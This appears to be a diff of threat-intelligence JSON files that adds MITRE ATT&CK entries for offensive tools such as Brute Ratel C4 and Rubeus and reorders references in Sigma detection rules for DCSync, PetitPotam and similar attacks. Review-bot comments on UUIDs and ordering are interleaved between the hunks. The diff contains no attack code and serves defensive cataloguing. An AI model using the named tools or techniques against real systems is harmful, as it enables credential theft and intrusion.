+ "description": "[Brute Ratel C4](https://attack.mitre.org/software/S1063) is a commercial red-teaming and adversarial attack simulation tool that first appeared in December 2020. [Brute Ratel C4](https://attack.mitre.org/software/S1063) was specifically designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities, and deploys agents called badgers to enable arbitrary command execution for lateral movement, privilege escalation, and persistence. In September 2022, a cracked version of [Brute Ratel C4](https://attack.mitre.org/software/S1063) was leaked in the cybercriminal underground, leading to its use by threat actors.(Citation: Dark Vortex Brute Ratel C4)(Citation: Palo Alto Brute Ratel July 2022)(Citation: MDSec Brute Ratel August 2022)(Citation: SANS Brute Ratel October 2022)(Citation: Trend Micro Black Basta October 2022)",
+ "meta": {
+ "external_id": "S1063",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1063",
+ "https://bruteratel.com/",
+ "https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/",
+ "https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/",
+ "https://www.sans.org/blog/cracked-brute-ratel-c4-framework-proliferates-across-the-cybercriminal-underground/",
+ "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html"
+ ],
+ "synonyms": [
+ "Brute Ratel C4",
+ "BRc4"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "208884f1-7b83-4473-ac22-4e1cf6c41471",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4933e63b-9b77-476e-ab29-761bc5b7d15a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4bed873f-0b7d-41d4-b93a-b6905d1f90b0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "74d2a63f-3c7b-4852-92da-02d8fbab16da",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ea4c2f9c-9df1-477c-8c42-6da1118f2ac4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "75d8b521-6b6a-42ff-8af3-d97e20ce12a5",
+ "value": "Brute Ratel C4 - S1063"
+ },
{
"description": "[Pass-The-Hash Toolkit](https://attack.mitre.org/software/S0122) is a toolkit that allows an adversary to \"pass\" a password hash (without knowing the original password) to log in to systems. (Citation: Mandiant APT1)",
"meta": {
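Review bot: the new Brute Ratel C4 entry lists `"dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a"` under `related`, yet other hunks in this same diff (old ranges -58649, -62915 and -70882 in mitre-malware.json, -3189 and -5009 in this file) remove that UUID or replace it with `d511a6f6-4a33-41d5-bc95-c343875d1377`. If b3d682b6 has been superseded upstream, this entry points at a stale target from the moment it lands; confirm it is still a valid cluster UUID in the attack-pattern galaxy before merging. Otherwise the entry is well-formed: refs and dest-uuids are lexicographically sorted and the comma placement keeps the JSON valid.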
@@ -1117,6 +1373,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
"tags": [
@@ -1211,6 +1474,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
"tags": [
@@ -2292,6 +2562,64 @@
"uuid": "102c3898-85e0-43ee-ae28-62a0a3ed9507",
"value": "UACMe - S0116"
},
+ {
+ "description": "[Rubeus](https://attack.mitre.org/software/S1071) is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.(Citation: GitHub Rubeus March 2023)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)",
+ "meta": {
+ "external_id": "S1071",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1071",
+ "https://github.com/GhostPack/Rubeus",
+ "https://thedfirreport.com/2020/10/08/ryuks-return/",
+ "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
+ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html"
+ ],
+ "synonyms": [
+ "Rubeus"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "3986e7fd-a8e9-4ecb-bfc6-55920855912b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "768dce68-8d0d-477a-b01d-0eea98b963a1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d273434a-448e-4598-8e14-607f4a0d5e27",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "e33267fe-099f-4af2-8730-63d49f8813b2",
+ "value": "Rubeus - S1071"
+ },
{
"description": "[Cachedump](https://attack.mitre.org/software/S0119) is a publicly-available tool that program extracts cached password hashes from a system’s registry. (Citation: Mandiant APT1)",
"meta": {
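Review bot: Rubeus (S1071) is inserted between UACMe S0116 and Cachedump S0119, and the Brute Ratel C4 entry (S1063) earlier in this file sits between S0005 and S0122, so entries are clearly not ordered by `external_id`. That is acceptable if the generator emits them in upstream STIX order, but if the position depends on dictionary iteration order the next regeneration will move whole entries and produce unreviewable diffs; confirm the ordering is deterministic. The entry itself is consistent: refs and the five dest-uuids are sorted and the JSON nesting is balanced.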
@@ -3003,6 +3331,9 @@
"refs": [
"https://attack.mitre.org/software/S0174",
"https://github.com/SpiderLabs/Responder"
+ ],
+ "synonyms": [
+ "Responder"
]
},
"related": [
@@ -3189,13 +3520,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "bf96a5a3-3bce-43b7-8597-88545984c07b",
"tags": [
@@ -3211,14 +3535,14 @@
"type": "uses"
},
{
- "dest-uuid": "c4ad009b-6e13-4419-8d21-918a1652de02",
+ "dest-uuid": "d336b553-5da9-46ca-98a8-0b23f49fb447",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "d336b553-5da9-46ca-98a8-0b23f49fb447",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -3728,8 +4052,8 @@
"refs": [
"https://attack.mitre.org/software/S0332",
"https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html",
- "https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html",
- "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/"
+ "https://web.archive.org/web/20180124082756/https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/",
+ "https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html"
],
"synonyms": [
"Remcos"
@@ -5009,13 +5333,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b7dc639b-24cd-482d-a7f1-8897eda21023",
"tags": [
@@ -5079,6 +5396,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48",
"tags": [
@@ -6393,6 +6717,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "b4409cd8-0da9-46e1-a401-a241afd4d1cc",
"tags": [
@@ -6407,6 +6738,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d94b3ae9-8059-4989-8e9f-ea0f601f80a7",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "e24fcba8-2557-4442-a139-1ee2f2e784db",
"tags": [
@@ -6542,5 +6880,5 @@
"value": "Mythic - S0699"
}
],
- "version": 27
+ "version": 28
}
diff --git a/clusters/sigma-rules.json b/clusters/sigma-rules.json
index e56193c..3a055b2 100644
--- a/clusters/sigma-rules.json
+++ b/clusters/sigma-rules.json
@@ -76,8 +76,8 @@
"logsource.category": "firewall",
"logsource.product": "No established product",
"refs": [
- "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
"https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
"https://www.cisecurity.org/controls/cis-controls-list/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_cleartext_protocols.yml"
],
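Review bot: this hunk and the several dozen that follow in clusters/sigma-rules.json only reorder the `refs` arrays; each list keeps the same URLs, with the rule's own SigmaHQ link last. If the generator takes the order from the upstream rule's `references` list, this is churn from upstream edits and acceptable; if it builds the list from a set or dict, the order is not deterministic and every regeneration will produce a diff like this one. Either way, emitting the non-SigmaHQ refs in a stable order (sorted, or explicitly in upstream order) would keep future diffs reviewable. As it stands, the real content changes to the LSASS rule further down are buried in reorder noise.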
@@ -99,8 +99,8 @@
"logsource.category": "firewall",
"logsource.product": "No established product",
"refs": [
- "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation",
"https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195",
+ "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation",
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml"
],
"tags": [
@@ -134,10 +134,10 @@
"logsource.category": "dns",
"logsource.product": "No established product",
"refs": [
- "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/",
- "https://core.telegram.org/bots/faq",
- "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/",
"https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/",
+ "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/",
+ "https://core.telegram.org/bots/faq",
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml"
],
"tags": [
@@ -246,8 +246,8 @@
"logsource.category": "dns",
"logsource.product": "No established product",
"refs": [
- "https://twitter.com/stvemillertime/status/1024707932447854592",
"https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1",
+ "https://twitter.com/stvemillertime/status/1024707932447854592",
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml"
],
"tags": [
@@ -1209,9 +1209,9 @@
"logsource.category": "No established category",
"logsource.product": "zeek",
"refs": [
- "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf",
"https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp",
"https://msrc.microsoft.com/update-guide/vulnerability/ADV210003",
+ "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf",
"https://threatpost.com/microsoft-petitpotam-poc/168163/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml"
],
@@ -1590,9 +1590,9 @@
"logsource.category": "No established category",
"logsource.product": "zeek",
"refs": [
- "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/",
"https://github.com/Maka8ka/NGLite",
"https://github.com/nknorg/nkn-sdk-go",
+ "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml"
],
"tags": [
@@ -1649,8 +1649,8 @@
"logsource.category": "No established category",
"logsource.product": "zeek",
"refs": [
- "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1",
"https://twitter.com/_dirkjan/status/1309214379003588608",
+ "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1",
"https://dirkjanm.io/a-different-way-of-abusing-zerologon/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml"
],
@@ -1726,11 +1726,11 @@
"logsource.category": "No established category",
"logsource.product": "zeek",
"refs": [
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29",
- "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527",
- "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/",
"https://old.zeek.org/zeekweek2019/slides/bzar.pdf",
+ "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/",
+ "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek",
+ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29",
"https://github.com/corelight/CVE-2021-1675",
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml"
],
@@ -1863,10 +1863,10 @@
"logsource.category": "No established category",
"logsource.product": "zeek",
"refs": [
- "https://twitter.com/neu5ron/status/1346245602502443009",
- "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS",
- "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma",
"https://tools.ietf.org/html/rfc2929#section-2.1",
+ "https://twitter.com/neu5ron/status/1346245602502443009",
+ "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma",
+ "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS",
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml"
],
"tags": [
@@ -2175,9 +2175,9 @@
"logsource.category": "application",
"logsource.product": "jvm",
"refs": [
- "https://rules.sonarsource.com/java/RSPEC-2755",
- "https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing",
"https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs",
+ "https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing",
+ "https://rules.sonarsource.com/java/RSPEC-2755",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_xxe_exploitation_attempt.yml"
],
"tags": [
@@ -2210,8 +2210,8 @@
"logsource.category": "application",
"logsource.product": "jvm",
"refs": [
- "https://secariolabs.com/research/analysing-and-reproducing-poc-for-log4j-2-15-0",
"https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs",
+ "https://secariolabs.com/research/analysing-and-reproducing-poc-for-log4j-2-15-0",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_jndi_injection_exploitation_attempt.yml"
],
"tags": [
@@ -2313,10 +2313,10 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://github.com/zeronetworks/rpcfirewall",
+ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md",
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3",
+ "https://github.com/zeronetworks/rpcfirewall",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml"
],
"tags": [
@@ -2349,8 +2349,8 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
+ "https://github.com/zeronetworks/rpcfirewall",
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml"
@@ -2375,9 +2375,9 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
+ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml"
],
@@ -2401,10 +2401,10 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md",
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9",
+ "https://github.com/zeronetworks/rpcfirewall",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml"
],
"tags": [
@@ -2437,9 +2437,9 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
+ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml"
],
@@ -2481,10 +2481,10 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md",
"https://github.com/zeronetworks/rpcfirewall",
- "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN",
+ "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md",
+ "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml"
],
"tags": [
@@ -2517,8 +2517,8 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
+ "https://github.com/zeronetworks/rpcfirewall",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml"
],
"tags": [
@@ -2541,9 +2541,9 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
+ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml"
],
@@ -2585,9 +2585,9 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9",
+ "https://github.com/zeronetworks/rpcfirewall",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml"
],
"tags": [
@@ -2628,9 +2628,9 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/zeronetworks/rpcfirewall",
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
+ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml"
],
@@ -2672,11 +2672,11 @@
"logsource.category": "application",
"logsource.product": "rpc_firewall",
"refs": [
- "https://github.com/zeronetworks/rpcfirewall",
